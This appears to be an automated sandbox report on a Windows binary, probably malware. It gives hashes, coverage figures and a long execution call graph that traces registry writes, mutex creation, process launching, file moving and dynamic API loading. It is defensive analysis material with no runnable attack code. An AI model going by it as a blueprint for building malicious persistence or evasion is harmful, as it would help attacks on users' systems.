        • API String ID: 2574300362-2738580789
        • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
        • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
        • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
        • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
        Uniqueness

        Uniqueness Score: -1.00%

        Execution Graph

        Execution Coverage:14.2%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0.6%
        Total number of Nodes:2000
        Total number of Limit Nodes:41

12917->12918 12919 c7d20 12918->12919 12920 c821d strncpy 12919->12920 12921 c7d2b 12920->12921 12922 c821d strncpy 12921->12922 12923 c7d3f 12922->12923 12924 c821d strncpy 12923->12924 12925 c7d53 12924->12925 12926 c8279 5 API calls 12925->12926 12927 c7d5e 12926->12927 12928 c821d strncpy 12927->12928 12929 c7d69 12928->12929 12930 c8279 5 API calls 12929->12930 12931 c7d77 12930->12931 12932 c821d strncpy 12931->12932 12933 c7d82 12932->12933 12934 c8279 5 API calls 12933->12934 12935 c7d8d 12934->12935 12936 c821d strncpy 12935->12936 12937 c7d98 12936->12937 12938 c8279 5 API calls 12937->12938 12939 c7da3 12938->12939 12940 c821d strncpy 12939->12940 12941 c7dae 12940->12941 12942 c8279 5 API calls 12941->12942 12943 c7db9 12942->12943 12944 c821d strncpy 12943->12944 12945 c7dc4 12944->12945 12946 c8279 5 API calls 12945->12946 12947 c7dcf 12946->12947 12948 c821d strncpy 12947->12948 12949 c7dda 12948->12949 12950 c8279 5 API calls 12949->12950 13006 c828a WideCharToMultiByte 13005->13006 13011 c7c27 13005->13011 13007 c82a4 13006->13007 13006->13011 13016 c8604 RtlAllocateHeap 13007->13016 13009 c82ae 13010 c82b8 WideCharToMultiByte 13009->13010 13009->13011 13012 c82df 13010->13012 13013 c82d1 13010->13013 13011->12884 13015 c861a 2 API calls 13012->13015 13014 c861a 2 API calls 13013->13014 13014->13011 13015->13011 13016->13009 13018 c90cf 13017->13018 13018->13018 13019 d242d _ftol2_sse 13018->13019 13020 c9119 13019->13020 13021 c74cc 13020->13021 13022 d242d _ftol2_sse 13020->13022 13021->12376 13022->13020 13024 cffa0 7 API calls 13023->13024 13025 c78ef 13024->13025 13026 c821d strncpy 13025->13026 13027 c7905 13026->13027 13028 c821d strncpy 13027->13028 13029 c791a 13028->13029 13030 c821d strncpy 13029->13030 13031 c792e 13030->13031 13032 c821d strncpy 13031->13032 13033 c7943 13032->13033 13034 c821d strncpy 13033->13034 13035 c7954 13034->13035 13036 c821d strncpy 13035->13036 13037 c796d 13036->13037 13038 c821d strncpy 13037->13038 13039 
c7983 13038->13039 13040 c821d strncpy 13039->13040 13041 c7994 13040->13041 13042 c821d strncpy 13041->13042 13043 c79a8 13042->13043 13044 c821d strncpy 13043->13044 13045 c79bb 13044->13045 13046 c821d strncpy 13045->13046 13047 c79cf 13046->13047 13048 c821d strncpy 13047->13048 13049 c79ee 13048->13049 13050 c8279 5 API calls 13049->13050 13051 c79ff 13050->13051 13052 c821d strncpy 13051->13052 13053 c7a0a 13052->13053 13054 c8279 5 API calls 13053->13054 13055 c7a1b 13054->13055 13056 c821d strncpy 13055->13056 13057 c7a26 13056->13057 13058 c821d strncpy 13057->13058 13059 c7a42 13058->13059 13060 d0a21 12 API calls 13059->13060 13061 c7a4a 13060->13061 13061->12380 13063 d0b0e 18 API calls 13062->13063 13064 c7320 13063->13064 13065 c96ca memset 13064->13065 13068 c732c 13064->13068 13066 c7360 13065->13066 13066->13068 13115 c8604 RtlAllocateHeap 13066->13115 13068->12391 13069 c7458 13070 c861a 2 API calls 13069->13070 13072 c7469 13069->13072 13070->13069 13071 c7404 13071->13068 13071->13069 13073 c91a6 RtlAllocateHeap 13071->13073 13074 c861a 2 API calls 13072->13074 13073->13071 13074->13068 13076 c71c8 13075->13076 13077 cb4a3 2 API calls 13076->13077 13085 c725e 13076->13085 13078 c71e4 13077->13078 13078->13085 13088 c7233 13078->13088 13116 c8604 RtlAllocateHeap 13078->13116 13080 c861a 2 API calls 13082 c7254 13080->13082 13081 c7201 13084 c9601 2 API calls 13081->13084 13081->13088 13083 c861a 2 API calls 13082->13083 13083->13085 13086 c7220 13084->13086 13085->12401 13089 c118e 13085->13089 13117 c82fe 13086->13117 13088->13080 13090 c110b 9 API calls 13089->13090 13091 c119f 13090->13091 13092 c11b0 memset 13091->13092 13093 c11ac 13091->13093 13094 c1da0 66 API calls 13092->13094 13093->12395 13095 c11d2 13094->13095 13095->12395 13097 cffa0 7 API calls 13096->13097 13098 c7a6c 13097->13098 13099 c821d strncpy 13098->13099 13100 c7a82 13099->13100 13101 c821d strncpy 13100->13101 13102 c7a96 13101->13102 13103 c821d strncpy 13102->13103 
13104 c7aa7 13103->13104 13105 c821d strncpy 13104->13105 13106 c7ab8 13105->13106 13107 c821d strncpy 13106->13107 13108 c7acd 13107->13108 13109 c821d strncpy 13108->13109 13110 c7ae3 13109->13110 13111 c821d strncpy 13110->13111 13112 c7af9 13111->13112 13113 d0a21 12 API calls 13112->13113 13114 c7b01 13113->13114 13114->12397 13115->13071 13116->13081 13124 c8604 RtlAllocateHeap 13117->13124 13119 c832a 13120 c8380 GetLastError 13119->13120 13122 c849e 13119->13122 13123 c840a 13119->13123 13120->13123 13121 c861a 2 API calls 13121->13122 13122->13088 13123->13121 13124->13119 13637 c229a 13638 c22ab 13637->13638 13639 c22c3 13637->13639 13640 c9749 2 API calls 13638->13640 13674 c2255 13639->13674 13643 c22b8 13640->13643 13647 c6aed 13643->13647 13644 c94b7 2 API calls 13646 c22dc 13644->13646 13648 c6b0f 13647->13648 13664 c6b07 13647->13664 13649 cb4a3 2 API calls 13648->13649 13650 c6b18 13649->13650 13650->13664 13681 cfccd 13650->13681 13652 c6b32 13654 c861a 2 API calls 13652->13654 13653 c6b2c 13653->13652 13655 c914f 5 API calls 13653->13655 13654->13664 13656 c6b65 13655->13656 13657 c60df 4 API calls 13656->13657 13656->13664 13658 c6b77 13657->13658 13659 c6b9c 13658->13659 13660 c6b84 13658->13660 13662 ca77d 3 API calls 13659->13662 13661 c861a 2 API calls 13660->13661 13661->13664 13663 c6baa 13662->13663 13665 c5886 8 API calls 13663->13665 13673 c6bbc 13663->13673 13664->13639 13666 c6bb8 13665->13666 13668 c9749 2 API calls 13666->13668 13666->13673 13667 c861a 2 API calls 13669 c6bf0 13667->13669 13670 c6bc9 13668->13670 13671 c861a 2 API calls 13669->13671 13672 c9f06 6 API calls 13670->13672 13671->13652 13672->13673 13673->13667 13675 cb4a3 2 API calls 13674->13675 13676 c2266 13675->13676 13677 ca0ab 6 API calls 13676->13677 13679 c2287 13676->13679 13680 c2296 13676->13680 13677->13679 13678 c861a 2 API calls 13678->13680 13679->13678 13680->13644 13682 cfcdc 13681->13682 13683 cfd18 13681->13683 13684 c861a 2 API calls 13682->13684 
13689 c8604 RtlAllocateHeap 13683->13689 13686 cfce5 13684->13686 13687 c8669 RtlAllocateHeap 13686->13687 13688 cfcfc 13686->13688 13687->13688 13688->13653 13689->13686 13690 cf69b 13693 c8604 RtlAllocateHeap 13690->13693 13692 cf6ab 13693->13692 13233 c2027 13234 c2064 13233->13234 13235 c2057 13233->13235 13236 c902d _ftol2_sse 13234->13236 13239 c206e 13234->13239 13263 c933a 13235->13263 13238 c2093 13236->13238 13240 cb4a3 2 API calls 13238->13240 13241 c20ab 13240->13241 13242 c20b2 13241->13242 13243 c9256 2 API calls 13241->13243 13244 c861a 2 API calls 13242->13244 13245 c20c1 13243->13245 13246 c2200 13244->13246 13270 cb27d memset 13245->13270 13248 c861a 2 API calls 13246->13248 13249 c220b 13248->13249 13250 c861a 2 API calls 13249->13250 13258 c2217 13250->13258 13251 c223f 13253 c94b7 2 API calls 13251->13253 13252 c92e5 RtlAllocateHeap lstrcatW 13262 c20cc 13252->13262 13253->13239 13254 c2234 13256 c861a 2 API calls 13254->13256 13255 c861a 2 API calls 13255->13258 13256->13251 13257 ca77d 3 API calls 13257->13262 13258->13251 13258->13254 13258->13255 13259 c861a HeapFree memset 13259->13262 13260 c91e3 RtlAllocateHeap 13260->13262 13261 ca911 memset CreateProcessW GetExitCodeProcess 13261->13262 13262->13242 13262->13252 13262->13257 13262->13259 13262->13260 13262->13261 13266 c9351 13263->13266 13265 c93b7 13265->13234 13285 c8604 RtlAllocateHeap 13266->13285 13267 c9392 lstrcatA 13268 c93a6 lstrcatA 13267->13268 13269 c9387 13267->13269 13268->13269 13269->13265 13269->13267 13286 c8604 RtlAllocateHeap 13270->13286 13272 cb2a4 13273 c91e3 RtlAllocateHeap 13272->13273 13284 cb328 13272->13284 13274 cb2c2 13273->13274 13275 c91e3 RtlAllocateHeap 13274->13275 13276 cb2d5 13275->13276 13277 c91e3 RtlAllocateHeap 13276->13277 13278 cb2e9 13277->13278 13279 c95e1 RtlAllocateHeap 13278->13279 13280 cb2f6 13279->13280 13281 c85d5 2 API calls 13280->13281 13282 cb31c 13281->13282 13283 c91e3 RtlAllocateHeap 13282->13283 13283->13284 13284->13262 
13285->13269 13286->13272 13396 c5431 13397 c950e 3 API calls 13396->13397 13398 c5449 13397->13398 13418 c5531 13398->13418 13419 c8604 RtlAllocateHeap 13398->13419 13400 c5460 13401 c95c7 RtlAllocateHeap 13400->13401 13400->13418 13402 c5478 13401->13402 13403 c9601 2 API calls 13402->13403 13404 c548d 13403->13404 13405 c85c2 2 API calls 13404->13405 13406 c5495 13405->13406 13407 ca77d 3 API calls 13406->13407 13408 c54a3 13407->13408 13409 c861a 2 API calls 13408->13409 13410 c54b0 13409->13410 13411 ca911 3 API calls 13410->13411 13415 c54bd 13411->13415 13412 cb1b1 13 API calls 13417 c54e8 13412->13417 13414 c5526 13416 c861a 2 API calls 13414->13416 13415->13417 13420 ca63b CreateFileW 13415->13420 13416->13418 13417->13412 13417->13414 13419->13400 13420->13415 13466 c2454 13467 c2509 13466->13467 13468 c246a 13466->13468 13470 c94b7 2 API calls 13467->13470 13469 cb4a3 2 API calls 13468->13469 13472 c2477 13469->13472 13471 c2516 13470->13471 13488 c9569 13472->13488 13475 c9256 2 API calls 13476 c2485 13475->13476 13476->13467 13477 c109a RtlAllocateHeap 13476->13477 13478 c2498 13477->13478 13479 c92e5 2 API calls 13478->13479 13480 c24b0 13479->13480 13481 c85d5 2 API calls 13480->13481 13482 c24be 13481->13482 13483 c24fa 13482->13483 13484 ca911 3 API calls 13482->13484 13485 c861a 2 API calls 13483->13485 13486 c24dd 13484->13486 13485->13467 13487 c861a 2 API calls 13486->13487 13487->13483 13489 c9572 13488->13489 13491 c247e 13488->13491 13492 c8604 RtlAllocateHeap 13489->13492 13491->13475 13492->13491 9947 c5cec 9964 d249b 9947->9964 9951 c5d08 9970 c8f78 9951->9970 9963 c5d6c 9965 d24b3 GetModuleHandleA 9964->9965 9967 c5d03 9964->9967 9968 d24ce 9965->9968 9966 d2547 LoadLibraryA 9966->9967 9966->9968 9969 c85ef HeapCreate 9967->9969 9968->9966 9968->9967 9969->9951 10031 c8604 RtlAllocateHeap 9970->10031 9972 c5d0d 9973 c5eb6 9972->9973 10032 ce1bc 9973->10032 9976 ce1bc 7 API calls 9977 c5ee3 9976->9977 9978 ce1bc 7 API calls 9977->9978 
9979 c5efc 9978->9979 9980 ce1bc 7 API calls 9979->9980 9981 c5f15 9980->9981 9982 ce1bc 7 API calls 9981->9982 9983 c5f30 9982->9983 9984 ce1bc 7 API calls 9983->9984 9985 c5f49 9984->9985 9986 ce1bc 7 API calls 9985->9986 9987 c5f62 9986->9987 9988 ce1bc 7 API calls 9987->9988 9989 c5d26 9988->9989 9990 ccf84 GetCurrentProcess 9989->9990 10074 cba05 9990->10074 9992 ccf9d GetModuleFileNameW 9993 ccfbb 9992->9993 9994 ccfd3 memset GetVersionExA GetCurrentProcessId 9993->9994 10081 ce3b6 9994->10081 9996 cd004 10086 ce3f1 9996->10086 9999 ca86d 10000 ca886 9999->10000 10105 ca7bc 10000->10105 10003 cb337 10005 cb34a 10003->10005 10004 c5d58 memset 10007 c5c26 10004->10007 10005->10004 10006 cb363 CloseHandle 10005->10006 10006->10004 10125 c9b43 10007->10125 10010 c5c51 10010->9963 10011 c5c69 10179 c5d7d 10011->10179 10015 c5c78 10018 c5c7d 10015->10018 10019 c5ccc 10015->10019 10016 c5cc7 10212 c5aff 10016->10212 10020 c5ce8 10018->10020 10023 ca86d 5 API calls 10018->10023 10019->10020 10030 c5cc5 10019->10030 10225 cf8cc 10019->10225 10020->9963 10024 c5c9d 10023->10024 10025 cb337 CloseHandle 10024->10025 10026 c5ca5 10025->10026 10188 c5974 10026->10188 10246 c5a61 RtlAddVectoredExceptionHandler 10030->10246 10031->9972 10042 c95c7 10032->10042 10035 ce1de GetModuleHandleA 10037 ce1ed 10035->10037 10036 ce1e6 LoadLibraryA 10036->10037 10038 ce1fb 10037->10038 10045 ce171 10037->10045 10050 c85c2 10038->10050 10054 c84ab 10042->10054 10059 c8604 RtlAllocateHeap 10045->10059 10047 ce183 10048 ce1b2 10047->10048 10060 cdfad 10047->10060 10048->10038 10051 c85ca 10050->10051 10052 c5eca 10050->10052 10066 c861a 10051->10066 10052->9976 10055 c84c1 10054->10055 10057 c84e2 10054->10057 10055->10057 10058 c8604 RtlAllocateHeap 10055->10058 10057->10035 10057->10036 10058->10057 10059->10047 10061 ce021 10060->10061 10062 cdfc6 10060->10062 10061->10047 10062->10061 10063 ce079 LoadLibraryA 10062->10063 10063->10061 10064 ce087 GetProcAddress 10063->10064 
10064->10061 10065 ce093 10064->10065 10065->10061 10067 c8666 10066->10067 10068 c8624 10066->10068 10067->10052 10068->10067 10071 c874f 10068->10071 10072 c8758 memset 10071->10072 10073 c8654 HeapFree 10071->10073 10072->10073 10073->10067 10075 cba1d 10074->10075 10076 cba21 10075->10076 10090 cb998 GetTokenInformation 10075->10090 10076->9992 10079 cba52 CloseHandle 10080 cba3e 10079->10080 10080->9992 10082 ce3cd 10081->10082 10083 ce3ed 10082->10083 10100 c91e3 10082->10100 10083->9996 10085 ce3da 10085->9996 10088 ce410 10086->10088 10087 c5d2b 10087->9999 10088->10087 10089 c91e3 RtlAllocateHeap 10088->10089 10089->10087 10091 cb9ba GetLastError 10090->10091 10092 cb9d7 10090->10092 10091->10092 10093 cb9c5 10091->10093 10092->10079 10092->10080 10099 c8604 RtlAllocateHeap 10093->10099 10095 cb9cd 10095->10092 10096 cb9db GetTokenInformation 10095->10096 10096->10092 10097 cb9f0 10096->10097 10098 c861a 2 API calls 10097->10098 10098->10092 10099->10095 10101 c91ec 10100->10101 10103 c91fe 10100->10103 10104 c8604 RtlAllocateHeap 10101->10104 10103->10085 10104->10103 10114 d22d3 10105->10114 10107 ca7d4 10108 c95c7 RtlAllocateHeap 10107->10108 10109 ca7fe 10108->10109 10118 c9601 10109->10118 10111 ca85c 10112 c85c2 2 API calls 10111->10112 10113 c5d50 10112->10113 10113->10003 10115 d22fd 10114->10115 10116 d22de 10114->10116 10115->10107 10116->10115 10122 d242d 10116->10122 10119 c874f memset 10118->10119 10120 c9615 _vsnprintf 10119->10120 10121 c962f 10120->10121 10121->10111 10123 d243c 10122->10123 10124 d2480 _ftol2_sse 10123->10124 10124->10116 10249 c8604 RtlAllocateHeap 10125->10249 10127 c9b6d 10128 c5c45 10127->10128 10250 cb5f6 10127->10250 10128->10010 10128->10011 10168 cfb19 10128->10168 10131 c95c7 RtlAllocateHeap 10132 c9bb0 10131->10132 10133 c9ceb 10132->10133 10137 c9bdc 10132->10137 10134 c9d3c 10133->10134 10135 c9cfd 10133->10135 10136 c9292 2 API calls 10134->10136 10138 c9292 2 API calls 10135->10138 10163 c9ce7 10135->10163 
10136->10163 10137->10163 10260 c9292 10137->10260 10138->10163 10139 c85c2 2 API calls 10140 c9d5c RegOpenKeyExA 10139->10140 10141 c9db2 RegCloseKey 10140->10141 10142 c9d76 RegCreateKeyA 10140->10142 10147 c9def 10141->10147 10142->10141 10144 c9d8d 10142->10144 10146 c861a 2 API calls 10144->10146 10148 c9d9b memset 10146->10148 10153 c861a 2 API calls 10147->10153 10149 c861a 2 API calls 10148->10149 10149->10141 10151 c9ca1 10156 c9292 2 API calls 10151->10156 10153->10128 10158 c9cc8 10156->10158 10162 c861a 2 API calls 10158->10162 10162->10163 10163->10139 10164 c861a 2 API calls 10166 c9c96 10164->10166 10167 c861a 2 API calls 10166->10167 10167->10151 10293 c8604 RtlAllocateHeap 10168->10293 10170 cfb20 10171 cfb2a 10170->10171 10294 ca6a9 10170->10294 10171->10011 10174 cfb6e 10174->10011 10176 cfb55 10177 cf8cc 25 API calls 10176->10177 10178 cfb6b 10177->10178 10178->10011 10180 ca86d 5 API calls 10179->10180 10181 c5d9a 10180->10181 10182 c5974 9 API calls 10181->10182 10184 c5c6e 10181->10184 10183 c5dd4 10182->10183 10183->10184 10350 c9ebb 10183->10350 10184->10015 10184->10016 10187 c5de6 lstrcmpiW 10187->10184 10189 ca86d 5 API calls 10188->10189 10190 c598d 10189->10190 10191 c599a 10190->10191 10192 c9292 2 API calls 10190->10192 10193 c59bd 10192->10193 10383 c590c 10193->10383 10195 c59cd 10196 c59f1 10195->10196 10199 c590c 3 API calls 10195->10199 10197 c861a 2 API calls 10196->10197 10198 c59fd 10197->10198 10200 c5bc4 10198->10200 10199->10196 10201 c9ebb 7 API calls 10200->10201 10202 c5bce 10201->10202 10203 c5bdc lstrcmpiW 10202->10203 10204 c5bd7 10202->10204 10205 c5c14 10203->10205 10206 c5bf2 10203->10206 10204->10030 10208 c861a 2 API calls 10205->10208 10388 c9f6c 10206->10388 10208->10204 10210 c5c0d 10392 cb1b1 SetFileAttributesW memset 10210->10392 10439 c8604 RtlAllocateHeap 10212->10439 10214 c5b11 10215 c5b24 GetDriveTypeW 10214->10215 10216 c5b55 10214->10216 10215->10216 10440 c5a7b 10216->10440 10218 c5b71 10219 c5ba1 
10218->10219 10457 c4d6d 10218->10457 10548 ca39e 10219->10548 10223 ca39e 2 API calls 10224 c5bbd 10223->10224 10224->10019 10226 c109a RtlAllocateHeap 10225->10226 10227 cf8db 10226->10227 11115 c61b4 memset 10227->11115 10230 c85d5 2 API calls 10231 cf901 10230->10231 10245 cf978 10231->10245 11132 c9e66 10231->11132 10235 cf92c 10236 c109a RtlAllocateHeap 10235->10236 10235->10245 10237 cf93e 10236->10237 10238 c9640 2 API calls 10237->10238 10239 cf94d 10238->10239 10240 ca911 3 API calls 10239->10240 10241 cf95e 10240->10241 10244 cf96c 10241->10244 11138 ca239 10241->11138 10243 c861a 2 API calls 10243->10245 10244->10243 10245->10030 11146 c5631 10246->11146 10249->10127 10251 cb60f 10250->10251 10252 d242d _ftol2_sse 10251->10252 10253 cb61f 10252->10253 10254 c95c7 RtlAllocateHeap 10253->10254 10256 cb62e 10254->10256 10255 cb66a 10257 c85c2 2 API calls 10255->10257 10256->10255 10258 d242d _ftol2_sse 10256->10258 10259 c9b91 10257->10259 10258->10256 10259->10131 10261 c92a4 10260->10261 10285 c8604 RtlAllocateHeap 10261->10285 10263 c92de 10263->10144 10263->10151 10266 c95e1 10263->10266 10264 c92c1 10264->10263 10265 c92cd lstrcatA 10264->10265 10265->10264 10286 c8531 10266->10286 10268 c95fc 10269 c92e5 10268->10269 10270 c92f7 10269->10270 10291 c8604 RtlAllocateHeap 10270->10291 10272 c9316 10273 c9333 10272->10273 10274 c9322 lstrcatW 10272->10274 10275 c85d5 10273->10275 10274->10272 10276 c85eb 10275->10276 10277 c85e3 10275->10277 10279 c9256 10276->10279 10278 c861a 2 API calls 10277->10278 10278->10276 10280 c928c 10279->10280 10281 c925f 10279->10281 10280->10164 10292 c8604 RtlAllocateHeap 10281->10292 10283 c9271 10283->10280 10284 c9279 MultiByteToWideChar 10283->10284 10284->10280 10285->10264 10288 c854d 10286->10288 10290 c8604 RtlAllocateHeap 10288->10290 10289 c8581 10289->10268 10289->10289 10290->10289 10291->10272 10292->10283 10293->10170 10295 ca6c2 10294->10295 10297 ca6bb 10294->10297 10331 ca63b CreateFileW 10295->10331 
10297->10174 10307 cf9bf 10297->10307 10298 ca6c9 10298->10297 10299 ca73d 10298->10299 10332 c8604 RtlAllocateHeap 10298->10332 10299->10297 10301 c861a 2 API calls 10299->10301 10301->10297 10302 ca72d ReadFile 10302->10299 10303 ca6f0 10302->10303 10303->10299 10303->10302 10304 ca75e 10303->10304 10304->10299 10305 ca763 CloseHandle 10304->10305 10305->10297 10333 c8604 RtlAllocateHeap 10307->10333 10309 cfb10 10309->10176 10310 cf9d2 10310->10309 10313 cfabc 10310->10313 10334 c109a 10310->10334 10315 cfae5 Sleep 10313->10315 10316 cfb06 10313->10316 10337 ca77d 10313->10337 10315->10313 10315->10316 10317 c861a 2 API calls 10316->10317 10317->10309 10318 c95e1 RtlAllocateHeap 10319 cfa2c 10318->10319 10320 c92e5 2 API calls 10319->10320 10321 cfa49 10320->10321 10322 ca6a9 6 API calls 10321->10322 10323 cfa56 10322->10323 10324 c85d5 2 API calls 10323->10324 10325 cfa62 10324->10325 10326 c85d5 2 API calls 10325->10326 10328 cfa6b 10326->10328 10327 c861a 2 API calls 10329 cfab1 10327->10329 10328->10327 10330 c861a 2 API calls 10329->10330 10330->10313 10331->10298 10332->10303 10333->10310 10335 c8531 RtlAllocateHeap 10334->10335 10336 c10b5 10335->10336 10336->10318 10344 ca5f7 CreateFileW 10337->10344 10340 ca792 10340->10313 10343 ca7ae CloseHandle 10343->10340 10345 ca61c 10344->10345 10345->10340 10346 ca65c 10345->10346 10347 ca69e 10346->10347 10348 ca66f WriteFile 10346->10348 10347->10340 10347->10343 10348->10347 10349 ca693 10348->10349 10349->10347 10349->10348 10353 c9f95 10350->10353 10354 c9fbe 10353->10354 10365 c9b0e 10354->10365 10356 c5de2 10356->10184 10356->10187 10357 c9fc9 10357->10356 10368 cbe9b RegOpenKeyExA 10357->10368 10359 ca095 10360 c861a 2 API calls 10359->10360 10360->10356 10361 ca070 10363 c861a 2 API calls 10361->10363 10362 c9ffd 10362->10359 10362->10361 10377 c8669 10362->10377 10363->10359 10380 c8604 RtlAllocateHeap 10365->10380 10367 c9b1a 10367->10357 10369 cbec9 RegQueryValueExA 10368->10369 10373 cbec5 
10368->10373 10370 cbee8 10369->10370 10376 cbf15 10369->10376 10381 c8604 RtlAllocateHeap 10370->10381 10372 cbf26 RegCloseKey 10372->10373 10373->10362 10374 cbef2 10375 cbef9 RegQueryValueExA 10374->10375 10374->10376 10375->10376 10376->10372 10376->10373 10382 c8604 RtlAllocateHeap 10377->10382 10379 c867a 10379->10361 10380->10367 10381->10374 10382->10379 10384 c591c CreateMutexA 10383->10384 10387 c5917 10383->10387 10385 c593f GetLastError 10384->10385 10386 c5934 GetLastError 10384->10386 10385->10387 10386->10387 10387->10195 10389 c9f7c 10388->10389 10405 ca0ab 10389->10405 10393 ca77d 3 API calls 10392->10393 10394 cb1ec 10393->10394 10395 d242d _ftol2_sse 10394->10395 10401 cb1ff 10394->10401 10396 cb21b 10395->10396 10423 c9640 10396->10423 10399 c92e5 2 API calls 10400 cb23d 10399->10400 10400->10401 10427 cb0de 10400->10427 10401->10205 10404 c861a 2 API calls 10404->10401 10406 ca0c8 10405->10406 10417 c5c08 10405->10417 10407 d242d _ftol2_sse 10406->10407 10406->10417 10408 ca112 10407->10408 10422 c8604 RtlAllocateHeap 10408->10422 10410 ca126 10411 d22d3 _ftol2_sse 10410->10411 10410->10417 10412 ca168 10411->10412 10413 c9b0e RtlAllocateHeap 10412->10413 10416 ca1b4 10413->10416 10414 ca21e 10415 c861a 2 API calls 10414->10415 10415->10417 10416->10414 10418 ca1c8 RegOpenKeyExA 10416->10418 10417->10205 10417->10210 10419 ca1ea RegSetValueExA 10418->10419 10420 ca1e5 10418->10420 10419->10420 10421 c861a 2 API calls 10420->10421 10421->10414 10422->10410 10424 c874f memset 10423->10424 10425 c9654 _vsnwprintf 10424->10425 10426 c9671 10425->10426 10426->10399 10428 cb101 10427->10428 10429 cb109 memset 10428->10429 10438 cb178 10428->10438 10430 c95e1 RtlAllocateHeap 10429->10430 10431 cb125 10430->10431 10432 d242d _ftol2_sse 10431->10432 10433 cb141 10432->10433 10434 c9640 2 API calls 10433->10434 10435 cb157 10434->10435 10436 c85d5 2 API calls 10435->10436 10437 cb160 MoveFileW 10436->10437 10437->10438 10438->10404 10439->10214 10556 
c1080 10440->10556 10445 c85c2 2 API calls 10446 c5ab7 10445->10446 10447 c1080 RtlAllocateHeap 10446->10447 10456 c5af7 10446->10456 10448 c5ac5 10447->10448 10565 c8910 10448->10565 10451 c5ae1 10453 c85c2 2 API calls 10451->10453 10454 c5aeb 10453->10454 10455 c861a 2 API calls 10454->10455 10455->10456 10456->10218 10458 c4dee 10457->10458 10459 c4d91 10457->10459 10665 cb7a8 memset GetComputerNameW lstrcpynW 10458->10665 10461 c95c7 RtlAllocateHeap 10459->10461 10463 c4d9b 10461->10463 10462 c4dfc 10464 ca86d 5 API calls 10462->10464 10465 c95c7 RtlAllocateHeap 10463->10465 10466 c4e08 10464->10466 10467 c4dab 10465->10467 10675 ca471 CreateMutexA 10466->10675 10467->10458 10469 c4db9 GetModuleHandleA 10467->10469 10471 c4dcd 10469->10471 10472 c4dc6 GetModuleHandleA 10469->10472 10470 c4e14 10473 ce1bc 7 API calls 10470->10473 10517 c4e1d 10470->10517 10475 c85c2 2 API calls 10471->10475 10472->10471 10474 c4e37 10473->10474 10476 c95e1 RtlAllocateHeap 10474->10476 10477 c4dde 10475->10477 10478 c4e48 10476->10478 10479 c85c2 2 API calls 10477->10479 10480 c92e5 2 API calls 10478->10480 10481 c4de7 10479->10481 10482 c4e60 10480->10482 10481->10458 10481->10517 10483 c85d5 2 API calls 10482->10483 10484 c4e73 10483->10484 10679 cb269 GetFileAttributesW 10484->10679 10486 c4e7b 10487 c4e9c 10486->10487 10785 c896f 10486->10785 10488 c861a 2 API calls 10487->10488 10490 c4ead 10488->10490 10680 c4a0b memset 10490->10680 10491 c4e8f 10491->10487 10494 ca2e3 8 API calls 10491->10494 10494->10487 10495 c51f1 10497 c95e1 RtlAllocateHeap 10495->10497 10499 c51fd 10497->10499 10500 c92e5 2 API calls 10499->10500 10501 c5215 10500->10501 10502 c5245 10501->10502 10806 cb269 GetFileAttributesW 10501->10806 10505 c85d5 2 API calls 10502->10505 10503 ce2c6 64 API calls 10507 c4f64 10503->10507 10508 c5251 lstrcpynW lstrcpynW 10505->10508 10506 c5229 10511 c861a 2 API calls 10506->10511 10507->10495 10509 c4fb3 10507->10509 10514 c5082 10507->10514 10510 c5296 
10508->10510 10509->10495 10516 c4fbc 10509->10516 10512 c861a 2 API calls 10510->10512 10511->10502 10513 c52a8 10512->10513 10515 c861a 2 API calls 10513->10515 10514->10495 10750 cfc1f 10514->10750 10515->10517 10805 c8604 RtlAllocateHeap 10516->10805 10517->10219 10520 c5006 10520->10517 10522 c95e1 RtlAllocateHeap 10520->10522 10524 c501f 10522->10524 10526 c9640 2 API calls 10524->10526 10525 c5110 10525->10495 10528 c109a RtlAllocateHeap 10525->10528 10527 c5052 10526->10527 10529 c85d5 2 API calls 10527->10529 10530 c5129 10528->10530 10531 c505c 10529->10531 10763 c902d 10530->10763 10533 ca911 3 API calls 10531->10533 10549 ca3ad 10548->10549 10555 c5bb5 10548->10555 10550 c861a 2 API calls 10549->10550 10553 ca3d2 10549->10553 10550->10549 10551 c861a 2 API calls 10552 ca3dd 10551->10552 10554 c861a 2 API calls 10552->10554 10553->10551 10554->10555 10555->10223 10557 c84ab RtlAllocateHeap 10556->10557 10558 c1096 10557->10558 10559 ca51a 10558->10559 10560 ca538 10559->10560 10561 d242d _ftol2_sse 10560->10561 10562 ca580 10560->10562 10564 c5aa7 10560->10564 10561->10560 10563 c8669 RtlAllocateHeap 10562->10563 10562->10564 10563->10564 10564->10445 10566 c891f 10565->10566 10572 c5ad4 10565->10572 10584 c8604 RtlAllocateHeap 10566->10584 10568 c8929 10568->10572 10585 c8815 10568->10585 10571 c861a 2 API calls 10571->10572 10572->10451 10573 ca2e3 10572->10573 10620 c8a90 10573->10620 10577 ca397 10577->10451 10578 ca38f 10635 c8cc0 10578->10635 10581 ca2fd 10581->10577 10581->10578 10582 c8698 3 API calls 10581->10582 10626 c9749 10581->10626 10631 c91a6 10581->10631 10582->10581 10584->10568 10595 c8604 RtlAllocateHeap 10585->10595 10587 c88d6 10588 c861a 2 API calls 10587->10588 10590 c8837 10587->10590 10588->10590 10589 c882a 10589->10587 10589->10590 10596 cebf0 10589->10596 10590->10571 10590->10572 10593 c88f0 10594 c861a 2 API calls 10593->10594 10594->10590 10595->10589 10611 c8604 RtlAllocateHeap 10596->10611 10598 cec14 10608 ced7f 
